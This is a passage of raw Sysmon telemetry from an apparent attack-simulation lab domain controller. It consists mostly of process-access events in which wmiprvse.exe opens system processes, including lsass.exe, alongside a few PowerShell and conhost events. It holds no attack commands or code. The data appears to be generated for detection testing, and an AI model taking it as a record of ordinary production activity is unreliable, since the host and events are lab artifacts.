+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D99-603E-ACAA-00000000AD01}459210804C:\Windows\system32\conhost.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002239551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kwkhisrk.zav.ps12021-03-02 16:53:45.295 10341000x80000000000000002239550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-ACAA-00000000AD01}4592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 